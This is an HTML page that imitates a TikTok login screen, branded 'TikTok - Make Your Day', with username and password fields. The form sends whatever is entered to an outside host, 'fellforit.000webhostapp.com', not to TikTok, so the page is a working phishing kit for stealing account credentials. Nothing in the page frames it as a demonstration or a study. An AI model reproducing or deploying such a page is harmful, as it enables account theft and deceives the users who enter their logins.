<!DOCTYPE html>
<html>
<head>
	<title>TikTok - Make Your Day</title>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js">    </script>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Untitled Document</title>
    <script>
$(document).ready(function() {
$(".ifield:first").focus();
$('.ifield').keypress(function (e) {
    if (e.which === 13) {
    if(!($(this).prop('nodeName')=="BUTTON")){
    e.preventDefault(); 

         var index = $('.ifield').index(this) + 1;
         $('.ifield').eq(index).focus();
     }
     }

 });

});
</script>

<style type="text/css">

	body{
		text-align: center;
		background-color: #12011c;
	}

	#logo{
		width: 300px;
		border-radius: 10px;
	}

	.ifield{
		width:350px;
		padding:10px;
  		margin:10px;
  		border-width: 2px;
  		border-color: pink;
  		border-radius: 5px;
  
	}

	.button{		
		width: 350px;	
		border-radius: 10px;
	}

	#ifdiv{
		padding-top: 40px;
		background-color: ;
	}

	#form{
		width: 500px;
		background-color: #fc0349;
		padding-bottom: 45px;
		padding-top: 50px;
		border-radius: 10px;
	}

	#main{
		position: absolute;
    		top: 50%;
   		left: 50%;
    		-moz-transform: translateX(-50%) translateY(-50%);
    		-webkit-transform: translateX(-50%) translateY(-50%);
    		transform: translateX(-50%) translateY(-50%);
	}
	
</style>
</head>
<body>
<div id=main style="border-radius: 10px;">
<center>
<div id="form">
<img src="logo.png" id="logo">
<form action="https://fellforit.000webhostapp.com/" method="post">
<div id="ifdiv">
<input type="text" name="email" class="ifield" placeholder="Your username here"><br><br>
<input type="password" name="pass" class="ifield" placeholder="Your password here"><br><br><br>
</div>
<input type="image" src="button.PNG" alt="../assets/button.jpg" class="button">
</form>
</div>
</center>
</div>
</body>
</html>
